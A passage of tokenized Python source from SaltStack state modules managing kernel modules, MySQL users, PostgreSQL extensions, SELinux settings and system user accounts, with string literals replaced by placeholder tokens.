'<STR_LIT>' : basic_auth , <EOL> '<STR_LIT>' : basic_auth_user , <EOL> '<STR_LIT>' : basic_auth_password , <EOL> '<STR_LIT>' : is_default , <EOL> '<STR_LIT>' : json_data , <EOL> } <EOL> def _diff ( old , new ) : <EOL> old_keys = old . keys ( ) <EOL> old = old . copy ( ) <EOL> new = new . copy ( ) <EOL> for key in old_keys : <EOL> if key == '<STR_LIT:id>' or key == '<STR_LIT>' : <EOL> del old [ key ] <EOL> elif old [ key ] == new [ key ] : <EOL> del old [ key ] <EOL> del new [ key ] <EOL> return { '<STR_LIT>' : old , '<STR_LIT>' : new } </s>
<s> '''<STR_LIT>''' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' in __salt__ <EOL> def _append_comment ( ret , comment ) : <EOL> '''<STR_LIT>''' <EOL> if len ( ret [ '<STR_LIT>' ] ) : <EOL> ret [ '<STR_LIT>' ] = ret [ '<STR_LIT>' ] . rstrip ( ) + '<STR_LIT:\n>' + comment <EOL> else : <EOL> ret [ '<STR_LIT>' ] = comment <EOL> return ret <EOL> def present ( name , persist = False , mods = None ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( mods , ( list , tuple ) ) : <EOL> mods = [ name ] <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> loaded_mods = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if persist : <EOL> persist_mods = __salt__ [ '<STR_LIT>' ] ( True ) <EOL> loaded_mods = list ( set ( loaded_mods ) & set ( persist_mods ) ) <EOL> already_loaded = list ( set ( loaded_mods ) & set ( mods ) ) <EOL> if len ( already_loaded ) == <NUM_LIT:1> : <EOL> comment = '<STR_LIT>' . format ( already_loaded [ <NUM_LIT:0> ] ) <EOL> _append_comment ( ret , comment ) <EOL> elif len ( already_loaded ) > <NUM_LIT:1> : <EOL> comment = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( already_loaded ) ) <EOL> _append_comment ( ret , comment ) <EOL> if len ( already_loaded ) == len ( mods ) : <EOL> return ret <EOL> not_loaded = list ( set ( mods ) - set ( already_loaded ) ) <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if len ( ret [ '<STR_LIT>' ] ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT:\n>' <EOL> if len ( not_loaded ) == <NUM_LIT:1> : <EOL> comment = '<STR_LIT>' . format ( not_loaded [ <NUM_LIT:0> ] ) <EOL> else : <EOL> comment = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( not_loaded ) ) <EOL> _append_comment ( ret , comment ) <EOL> return ret <EOL> unavailable = list ( set ( not_loaded ) - set ( __salt__ [ '<STR_LIT>' ] ( ) ) ) <EOL> if unavailable : <EOL> if len ( unavailable ) == <NUM_LIT:1> : <EOL> comment = '<STR_LIT>' . format ( unavailable [ <NUM_LIT:0> ] ) <EOL> else : <EOL> comment = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( unavailable ) ) <EOL> _append_comment ( ret , comment ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> available = list ( set ( not_loaded ) - set ( unavailable ) ) <EOL> loaded = { '<STR_LIT:yes>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> for mod in available : <EOL> load_result = __salt__ [ '<STR_LIT>' ] ( mod , persist ) <EOL> if isinstance ( load_result , ( list , tuple ) ) : <EOL> if len ( load_result ) > <NUM_LIT:0> : <EOL> for module in load_result : <EOL> ret [ '<STR_LIT>' ] [ module ] = '<STR_LIT>' <EOL> loaded [ '<STR_LIT:yes>' ] . append ( mod ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> loaded [ '<STR_LIT>' ] . append ( mod ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> loaded [ '<STR_LIT>' ] . append ( [ mod , load_result ] ) <EOL> if len ( loaded [ '<STR_LIT:yes>' ] ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( loaded [ '<STR_LIT:yes>' ] [ <NUM_LIT:0> ] ) ) <EOL> elif len ( loaded [ '<STR_LIT:yes>' ] ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( loaded [ '<STR_LIT:yes>' ] ) ) ) <EOL> if len ( loaded [ '<STR_LIT>' ] ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( loaded [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) ) <EOL> if len ( loaded [ '<STR_LIT>' ] ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( loaded [ '<STR_LIT>' ] ) ) ) <EOL> if len ( loaded [ '<STR_LIT>' ] ) : <EOL> for mod , msg in loaded [ '<STR_LIT>' ] : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( mod , msg ) ) <EOL> return ret <EOL> def absent ( name , persist = False , comment = True , mods = None ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( mods , ( list , tuple ) ) : <EOL> mods = [ name ] <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> loaded_mods = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if persist : <EOL> persist_mods = __salt__ [ '<STR_LIT>' ] ( True ) <EOL> loaded_mods = list ( set ( loaded_mods ) | set ( persist_mods ) ) <EOL> to_unload = list ( set ( mods ) & set ( loaded_mods ) ) <EOL> if to_unload : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if len ( to_unload ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( to_unload [ <NUM_LIT:0> ] ) ) <EOL> elif len ( to_unload ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( to_unload ) ) ) <EOL> return ret <EOL> unloaded = { '<STR_LIT:yes>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> for mod in to_unload : <EOL> unload_result = __salt__ [ '<STR_LIT>' ] ( mod , persist , comment ) <EOL> if isinstance ( unload_result , ( list , tuple ) ) : <EOL> if len ( unload_result ) > <NUM_LIT:0> : <EOL> for module in unload_result : <EOL> ret [ '<STR_LIT>' ] [ module ] = '<STR_LIT>' <EOL> unloaded [ '<STR_LIT:yes>' ] . append ( mod ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> unloaded [ '<STR_LIT>' ] . append ( mod ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> unloaded [ '<STR_LIT>' ] . append ( [ mod , unload_result ] ) <EOL> if len ( unloaded [ '<STR_LIT:yes>' ] ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( unloaded [ '<STR_LIT:yes>' ] [ <NUM_LIT:0> ] ) ) <EOL> elif len ( unloaded [ '<STR_LIT:yes>' ] ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( unloaded [ '<STR_LIT:yes>' ] ) ) ) <EOL> if len ( unloaded [ '<STR_LIT>' ] ) == <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( unloaded [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) ) <EOL> if len ( unloaded [ '<STR_LIT>' ] ) > <NUM_LIT:1> : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( unloaded [ '<STR_LIT>' ] ) ) ) <EOL> if len ( unloaded [ '<STR_LIT>' ] ) : <EOL> for mod , msg in unloaded [ '<STR_LIT>' ] : <EOL> _append_comment ( ret , '<STR_LIT>' . format ( mod , msg ) ) <EOL> return ret <EOL> else : <EOL> if len ( mods ) == <NUM_LIT:1> : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( mods [ <NUM_LIT:0> ] ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( mods ) ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import sys <EOL> import salt . utils <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' in __salt__ <EOL> def _get_mysql_error ( ) : <EOL> '''<STR_LIT>''' <EOL> return sys . modules [ <EOL> __salt__ [ '<STR_LIT>' ] . __module__ <EOL> ] . __context__ . pop ( '<STR_LIT>' , None ) <EOL> def present ( name , <EOL> host = '<STR_LIT:localhost>' , <EOL> password = None , <EOL> password_hash = None , <EOL> allow_passwordless = False , <EOL> unix_socket = False , <EOL> password_column = '<STR_LIT>' , <EOL> ** connection_args ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( name , host ) } <EOL> passwordless = not any ( ( password , password_hash ) ) <EOL> if passwordless : <EOL> if not salt . utils . is_true ( allow_passwordless ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> else : <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , passwordless = True , unix_socket = unix_socket , password_column = password_column , <EOL> ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> else : <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , password , password_hash , unix_socket = unix_socket , password_column = password_column , <EOL> ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> if password_hash and not password : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , unix_socket = unix_socket , ** connection_args ) : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if passwordless : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> if not salt . utils . is_true ( allow_passwordless ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> else : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , <EOL> password , password_hash , <EOL> allow_passwordless , unix_socket , <EOL> ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( name , host , <EOL> '<STR_LIT>' if passwordless else '<STR_LIT>' ) <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( '<STR_LIT>' if passwordless else '<STR_LIT>' , <EOL> name , host ) <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' . format ( err ) <EOL> if passwordless and not salt . utils . is_true ( allow_passwordless ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' '<STR_LIT>' <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if passwordless : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> if not salt . utils . is_true ( allow_passwordless ) : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , <EOL> password , password_hash , <EOL> allow_passwordless , unix_socket = unix_socket , password_column = password_column , <EOL> ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> if passwordless : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] += '<STR_LIT>' . format ( err ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> def absent ( name , <EOL> host = '<STR_LIT:localhost>' , <EOL> ** connection_args ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , ** connection_args ) : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name , <EOL> host ) <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , host , ** connection_args ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , host ) <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> else : <EOL> err = _get_mysql_error ( ) <EOL> if err is not None : <EOL> ret [ '<STR_LIT>' ] = err <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = ( <EOL> '<STR_LIT>' <EOL> ) . format ( name , host ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> from salt . modules import postgres <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' in __salt__ <EOL> def present ( name , <EOL> if_not_exists = None , <EOL> schema = None , <EOL> ext_version = None , <EOL> from_version = None , <EOL> user = None , <EOL> maintenance_db = None , <EOL> db_password = None , <EOL> db_host = None , <EOL> db_port = None , <EOL> db_user = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( name ) } <EOL> db_args = { <EOL> '<STR_LIT>' : maintenance_db , <EOL> '<STR_LIT>' : user , <EOL> '<STR_LIT:host>' : db_host , <EOL> '<STR_LIT:user>' : db_user , <EOL> '<STR_LIT:port>' : db_port , <EOL> '<STR_LIT:password>' : db_password , <EOL> } <EOL> mode = '<STR_LIT>' <EOL> mtdata = __salt__ [ '<STR_LIT>' ] ( <EOL> name , <EOL> schema = schema , <EOL> ext_version = ext_version , <EOL> ** db_args ) <EOL> toinstall = postgres . _EXTENSION_NOT_INSTALLED in mtdata <EOL> if toinstall : <EOL> mode = '<STR_LIT>' <EOL> toupgrade = False <EOL> if postgres . _EXTENSION_INSTALLED in mtdata : <EOL> for flag in [ <EOL> postgres . _EXTENSION_TO_MOVE , <EOL> postgres . _EXTENSION_TO_UPGRADE <EOL> ] : <EOL> if flag in mtdata : <EOL> toupgrade = True <EOL> mode = '<STR_LIT>' <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> if mode : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name , mode ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return ret <EOL> cret = None <EOL> if toinstall or toupgrade : <EOL> cret = __salt__ [ '<STR_LIT>' ] ( <EOL> name = name , <EOL> if_not_exists = if_not_exists , <EOL> schema = schema , <EOL> ext_version = ext_version , <EOL> from_version = from_version , <EOL> ** db_args ) <EOL> if cret : <EOL> if mode . endswith ( '<STR_LIT:e>' ) : <EOL> suffix = '<STR_LIT:d>' <EOL> else : <EOL> suffix = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , mode , suffix ) <EOL> elif cret is not None : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , mode ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> return ret <EOL> def absent ( name , <EOL> if_exists = None , <EOL> restrict = None , <EOL> cascade = None , <EOL> user = None , <EOL> maintenance_db = None , <EOL> db_password = None , <EOL> db_host = None , <EOL> db_port = None , <EOL> db_user = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> db_args = { <EOL> '<STR_LIT>' : maintenance_db , <EOL> '<STR_LIT>' : user , <EOL> '<STR_LIT:host>' : db_host , <EOL> '<STR_LIT:user>' : db_user , <EOL> '<STR_LIT:port>' : db_port , <EOL> '<STR_LIT:password>' : db_password , <EOL> } <EOL> exists = __salt__ [ '<STR_LIT>' ] ( name , ** db_args ) <EOL> if exists : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , <EOL> if_exists = if_exists , <EOL> restrict = restrict , <EOL> cascade = cascade , <EOL> ** db_args ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( name ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' if '<STR_LIT>' in __salt__ else False <EOL> def _refine_mode ( mode ) : <EOL> '''<STR_LIT>''' <EOL> mode = str ( mode ) . lower ( ) <EOL> if any ( [ mode . startswith ( '<STR_LIT:e>' ) , <EOL> mode == '<STR_LIT:1>' , <EOL> mode == '<STR_LIT>' ] ) : <EOL> return '<STR_LIT>' <EOL> if any ( [ mode . startswith ( '<STR_LIT:p>' ) , <EOL> mode == '<STR_LIT:0>' , <EOL> mode == '<STR_LIT>' ] ) : <EOL> return '<STR_LIT>' <EOL> if any ( [ mode . startswith ( '<STR_LIT:d>' ) ] ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def _refine_value ( value ) : <EOL> '''<STR_LIT>''' <EOL> value = str ( value ) . lower ( ) <EOL> if value in ( '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT:yes>' , '<STR_LIT:true>' ) : <EOL> return '<STR_LIT>' <EOL> if value in ( '<STR_LIT:0>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:false>' ) : <EOL> return '<STR_LIT>' <EOL> return None <EOL> def _refine_module_state ( module_state ) : <EOL> '''<STR_LIT>''' <EOL> module_state = str ( module_state ) . lower ( ) <EOL> if module_state in ( '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT:yes>' , '<STR_LIT:true>' , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> if module_state in ( '<STR_LIT:0>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:false>' , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def mode ( name ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> tmode = _refine_mode ( name ) <EOL> if tmode == '<STR_LIT>' : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> mode = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if mode == tmode : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( tmode ) <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> tmode ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> mode = __salt__ [ '<STR_LIT>' ] ( tmode ) <EOL> if mode == tmode : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( tmode ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( tmode ) <EOL> return ret <EOL> def boolean ( name , value , persist = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> bools = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if name not in bools : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> rvalue = _refine_value ( value ) <EOL> if rvalue is None : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( value ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> state = bools [ name ] [ '<STR_LIT>' ] == rvalue <EOL> default = bools [ name ] [ '<STR_LIT>' ] == rvalue <EOL> if persist : <EOL> if state and default : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return ret <EOL> else : <EOL> if state : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name , rvalue ) <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , rvalue , persist ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , rvalue ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , rvalue ) <EOL> return ret <EOL> def module ( name , module_state = '<STR_LIT>' , version = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } } <EOL> modules = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if name not in modules : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> rmodule_state = _refine_module_state ( module_state ) <EOL> if rmodule_state == '<STR_LIT>' : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( module_state , module ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if version != '<STR_LIT>' : <EOL> installed_version = modules [ name ] [ '<STR_LIT>' ] <EOL> if not installed_version == version : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( installed_version , version ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> current_module_state = _refine_module_state ( modules [ name ] [ '<STR_LIT>' ] ) <EOL> if rmodule_state == current_module_state : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name , module_state ) <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , rmodule_state ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , module_state ) <EOL> return ret <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , module_state ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> import logging <EOL> import salt . utils <EOL> from salt . utils . locales import sdecode , sdecode_if_string <EOL> from salt . ext . six import string_types , iteritems <EOL> log = logging . getLogger ( __name__ ) <EOL> def _group_changes ( cur , wanted , remove = False ) : <EOL> '''<STR_LIT>''' <EOL> old = set ( cur ) <EOL> new = set ( wanted ) <EOL> if ( remove and old != new ) or ( not remove and not new . issubset ( old ) ) : <EOL> return True <EOL> return False <EOL> def _changes ( name , <EOL> uid = None , <EOL> gid = None , <EOL> groups = None , <EOL> optional_groups = None , <EOL> remove_groups = True , <EOL> home = None , <EOL> createhome = True , <EOL> password = None , <EOL> enforce_password = True , <EOL> empty_password = False , <EOL> shell = None , <EOL> fullname = '<STR_LIT>' , <EOL> roomnumber = '<STR_LIT>' , <EOL> workphone = '<STR_LIT>' , <EOL> homephone = '<STR_LIT>' , <EOL> loginclass = None , <EOL> date = <NUM_LIT:0> , <EOL> mindays = <NUM_LIT:0> , <EOL> maxdays = <NUM_LIT> , <EOL> inactdays = <NUM_LIT:0> , <EOL> warndays = <NUM_LIT:7> , <EOL> expire = None , <EOL> win_homedrive = None , <EOL> win_profile = None , <EOL> win_logonscript = None , <EOL> win_description = None ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in __salt__ : <EOL> lshad = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> lusr = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if not lusr : <EOL> return False <EOL> change = { } <EOL> if groups is None : <EOL> groups = lusr [ '<STR_LIT>' ] <EOL> wanted_groups = sorted ( set ( ( groups or [ ] ) + ( optional_groups or [ ] ) ) ) <EOL> if uid and lusr [ '<STR_LIT>' ] != uid : <EOL> change [ '<STR_LIT>' ] = uid <EOL> if gid is not None and lusr [ '<STR_LIT>' ] not in ( gid , __salt__ [ '<STR_LIT>' ] ( gid ) ) : <EOL> change [ '<STR_LIT>' ] = gid <EOL> default_grp = __salt__ [ '<STR_LIT>' ] ( <EOL> gid if gid is not None else lusr [ '<STR_LIT>' ] <EOL> ) <EOL> if default_grp in lusr [ '<STR_LIT>' ] : <EOL> lusr [ '<STR_LIT>' ] . remove ( default_grp ) <EOL> if name in lusr [ '<STR_LIT>' ] and name not in wanted_groups : <EOL> lusr [ '<STR_LIT>' ] . remove ( name ) <EOL> if default_grp in wanted_groups : <EOL> wanted_groups . remove ( default_grp ) <EOL> if _group_changes ( lusr [ '<STR_LIT>' ] , wanted_groups , remove_groups ) : <EOL> change [ '<STR_LIT>' ] = wanted_groups <EOL> if home and lusr [ '<STR_LIT>' ] != home : <EOL> change [ '<STR_LIT>' ] = home <EOL> if createhome : <EOL> newhome = home if home else lusr [ '<STR_LIT>' ] <EOL> if newhome is not None and not os . path . isdir ( newhome ) : <EOL> change [ '<STR_LIT>' ] = newhome <EOL> if shell and lusr [ '<STR_LIT>' ] != shell : <EOL> change [ '<STR_LIT>' ] = shell <EOL> if '<STR_LIT>' in __salt__ and '<STR_LIT>' in __salt__ : <EOL> if password : <EOL> default_hash = __salt__ [ '<STR_LIT>' ] ( ) <EOL> if lshad [ '<STR_LIT>' ] == default_hash or lshad [ '<STR_LIT>' ] != default_hash and enforce_password : <EOL> if lshad [ '<STR_LIT>' ] != password : <EOL> change [ '<STR_LIT>' ] = password <EOL> if date and date is not <NUM_LIT:0> and lshad [ '<STR_LIT>' ] != date : <EOL> change [ '<STR_LIT:date>' ] = date <EOL> if mindays and mindays is not <NUM_LIT:0> and lshad [ '<STR_LIT>' ] != mindays : <EOL> change [ '<STR_LIT>' ] = mindays <EOL> if maxdays and maxdays is not <NUM_LIT> and lshad [ '<STR_LIT>' ] != maxdays : <EOL> change [ '<STR_LIT>' ] = maxdays <EOL> if inactdays and inactdays is not <NUM_LIT:0> and lshad [ '<STR_LIT>' ] != inactdays : <EOL> change [ '<STR_LIT>' ] = inactdays <EOL> if warndays and warndays is not <NUM_LIT:7> and lshad [ '<STR_LIT>' ] != warndays : <EOL> change [ 